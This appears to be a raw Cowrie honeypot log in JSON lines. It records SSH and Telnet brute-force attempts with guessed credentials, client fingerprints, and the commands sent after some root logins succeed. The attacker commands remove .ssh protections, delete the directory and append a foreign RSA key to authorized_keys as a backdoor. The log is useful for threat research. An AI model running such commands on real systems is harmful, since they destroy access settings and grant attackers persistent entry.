{"eventid":"cowrie.session.connect","src_ip":"157.20.207.165","src_port":39354,"dst_ip":"1.2.3.4","dst_port":22,"session":"ed67e0ff04fe","protocol":"ssh","message":"New connection: 157.20.207.165:39354 (1.2.3.4:22) [session: ed67e0ff04fe]","sensor":"my-vps","timestamp":"2025-09-09T06:21:27.526185Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:21:27.527323Z","src_ip":"157.20.207.165","session":"ed67e0ff04fe"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:21:27.711285Z","src_ip":"157.20.207.165","session":"ed67e0ff04fe"}
{"eventid":"cowrie.login.failed","username":"alex","password":"Password","message":"login attempt [alex/Password] failed","sensor":"my-vps","timestamp":"2025-09-09T06:21:28.489600Z","src_ip":"157.20.207.165","session":"ed67e0ff04fe"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:21:29.675668Z","src_ip":"157.20.207.165","session":"ed67e0ff04fe"}
{"eventid":"cowrie.session.connect","src_ip":"118.26.39.178","src_port":53234,"dst_ip":"1.2.3.4","dst_port":22,"session":"b740f00924c8","protocol":"ssh","message":"New connection: 118.26.39.178:53234 (1.2.3.4:22) [session: b740f00924c8]","sensor":"my-vps","timestamp":"2025-09-09T06:21:35.935035Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:21:35.936337Z","src_ip":"118.26.39.178","session":"b740f00924c8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:21:36.138738Z","src_ip":"118.26.39.178","session":"b740f00924c8"}
{"eventid":"cowrie.login.failed","username":"portal","password":"0","message":"login attempt [portal/0] failed","sensor":"my-vps","timestamp":"2025-09-09T06:21:36.974443Z","src_ip":"118.26.39.178","session":"b740f00924c8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33582,"dst_ip":"1.2.3.4","dst_port":22,"session":"57538080a80b","protocol":"ssh","message":"New connection: 212.227.235.229:33582 (1.2.3.4:22) [session: 57538080a80b]","sensor":"my-vps","timestamp":"2025-09-09T06:21:37.102851Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:21:37.103632Z","src_ip":"212.227.235.229","session":"57538080a80b"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:21:37.346217Z","src_ip":"212.227.235.229","session":"57538080a80b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59885,"dst_ip":"1.2.3.4","dst_port":22,"session":"5bde61b3fb8d","protocol":"ssh","message":"New connection: 212.227.235.229:59885 (1.2.3.4:22) [session: 5bde61b3fb8d]","sensor":"my-vps","timestamp":"2025-09-09T06:21:37.790615Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:21:37.793325Z","src_ip":"212.227.235.229","session":"5bde61b3fb8d"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:21:38.177153Z","src_ip":"118.26.39.178","session":"b740f00924c8"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:21:38.222253Z","src_ip":"212.227.235.229","session":"5bde61b3fb8d"}
{"eventid":"cowrie.login.failed","username":"redhat","password":"redhat1234","message":"login attempt [redhat/redhat1234] failed","sensor":"my-vps","timestamp":"2025-09-09T06:21:38.353829Z","src_ip":"212.227.235.229","session":"57538080a80b"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:21:39.597625Z","src_ip":"212.227.235.229","session":"57538080a80b"}
{"eventid":"cowrie.login.success","username":"root","password":"haslo123","message":"login attempt [root/haslo123] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:21:39.650067Z","src_ip":"212.227.235.229","session":"5bde61b3fb8d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:21:40.458049Z","src_ip":"212.227.235.229","session":"5bde61b3fb8d"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:21:40.458751Z","src_ip":"212.227.235.229","session":"5bde61b3fb8d"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:21:40.459944Z","src_ip":"212.227.235.229","session":"5bde61b3fb8d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.7","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:21:41.190998Z","src_ip":"212.227.235.229","session":"5bde61b3fb8d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:21:41.588821Z","src_ip":"212.227.235.229","session":"5bde61b3fb8d"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:21:41.589520Z","src_ip":"212.227.235.229","session":"5bde61b3fb8d"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:21:41.963287Z","src_ip":"212.227.235.229","session":"5bde61b3fb8d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:21:41.964274Z","src_ip":"212.227.235.229","session":"5bde61b3fb8d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60987,"dst_ip":"1.2.3.4","dst_port":22,"session":"1f425b3b1ab1","protocol":"ssh","message":"New connection: 212.227.235.229:60987 (1.2.3.4:22) [session: 1f425b3b1ab1]","sensor":"my-vps","timestamp":"2025-09-09T06:21:42.322862Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:21:42.324182Z","src_ip":"212.227.235.229","session":"1f425b3b1ab1"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:21:42.669316Z","src_ip":"212.227.235.229","session":"1f425b3b1ab1"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:21:45.821720Z","src_ip":"212.227.235.229","session":"1f425b3b1ab1"}
{"eventid":"cowrie.session.closed","duration":"4.8","message":"Connection lost after 4.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:21:47.162597Z","src_ip":"212.227.235.229","session":"1f425b3b1ab1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33712,"dst_ip":"1.2.3.4","dst_port":22,"session":"fb3877dca642","protocol":"ssh","message":"New connection: 212.227.235.229:33712 (1.2.3.4:22) [session: fb3877dca642]","sensor":"my-vps","timestamp":"2025-09-09T06:21:47.507030Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:21:47.522273Z","src_ip":"212.227.235.229","session":"fb3877dca642"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:21:47.863966Z","src_ip":"212.227.235.229","session":"fb3877dca642"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:21:49.878933Z","src_ip":"212.227.235.229","session":"fb3877dca642"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:21:50.237638Z","src_ip":"212.227.235.229","session":"fb3877dca642"}
{"eventid":"cowrie.session.closed","duration":"12.4","message":"Connection lost after 12.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:21:50.240630Z","src_ip":"212.227.235.229","session":"5bde61b3fb8d"}
{"eventid":"cowrie.session.connect","src_ip":"66.228.53.78","src_port":57522,"dst_ip":"1.2.3.4","dst_port":23,"session":"b00fa5e952e1","protocol":"telnet","message":"New connection: 66.228.53.78:57522 (1.2.3.4:23) [session: b00fa5e952e1]","sensor":"my-vps","timestamp":"2025-09-09T06:22:09.078799Z"}
{"eventid":"cowrie.login.failed","username":"GET / HTTP/1.1","password":"Host: 1.2.3.4:23","message":"login attempt [GET / HTTP/1.1/Host: 1.2.3.4:23] failed","sensor":"my-vps","timestamp":"2025-09-09T06:22:09.080076Z","src_ip":"66.228.53.78","session":"b00fa5e952e1"}
{"eventid":"cowrie.login.failed","username":"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36","password":"Accept: */*","message":"login attempt [User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36/Accept: */*] failed","sensor":"my-vps","timestamp":"2025-09-09T06:22:09.080817Z","src_ip":"66.228.53.78","session":"b00fa5e952e1"}
{"eventid":"cowrie.login.failed","username":"Accept-Encoding: gzip","password":"","message":"login attempt [Accept-Encoding: gzip/] failed","sensor":"my-vps","timestamp":"2025-09-09T06:22:09.081624Z","src_ip":"66.228.53.78","session":"b00fa5e952e1"}
{"eventid":"cowrie.session.closed","duration":0.13406991958618164,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:22:09.212801Z","src_ip":"66.228.53.78","session":"b00fa5e952e1"}
{"eventid":"cowrie.session.connect","src_ip":"66.228.53.78","src_port":57538,"dst_ip":"1.2.3.4","dst_port":23,"session":"9e488d7dcdc3","protocol":"telnet","message":"New connection: 66.228.53.78:57538 (1.2.3.4:23) [session: 9e488d7dcdc3]","sensor":"my-vps","timestamp":"2025-09-09T06:22:09.354209Z"}
{"eventid":"cowrie.session.closed","duration":0.0016918182373046875,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:22:09.355825Z","src_ip":"66.228.53.78","session":"9e488d7dcdc3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37650,"dst_ip":"1.2.3.4","dst_port":22,"session":"8fdf258a9ce7","protocol":"ssh","message":"New connection: 212.227.235.229:37650 (1.2.3.4:22) [session: 8fdf258a9ce7]","sensor":"my-vps","timestamp":"2025-09-09T06:22:09.519833Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:22:09.520832Z","src_ip":"212.227.235.229","session":"8fdf258a9ce7"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:22:09.855191Z","src_ip":"212.227.235.229","session":"8fdf258a9ce7"}
{"eventid":"cowrie.login.success","username":"root","password":"Ghostuser@1234","message":"login attempt [root/Ghostuser@1234] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:22:11.266954Z","src_ip":"212.227.235.229","session":"8fdf258a9ce7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:22:12.052536Z","src_ip":"212.227.235.229","session":"8fdf258a9ce7"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:22:12.053358Z","src_ip":"212.227.235.229","session":"8fdf258a9ce7"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:22:12.054705Z","src_ip":"212.227.235.229","session":"8fdf258a9ce7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.7","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:22:12.729198Z","src_ip":"212.227.235.229","session":"8fdf258a9ce7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:22:13.128984Z","src_ip":"212.227.235.229","session":"8fdf258a9ce7"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa 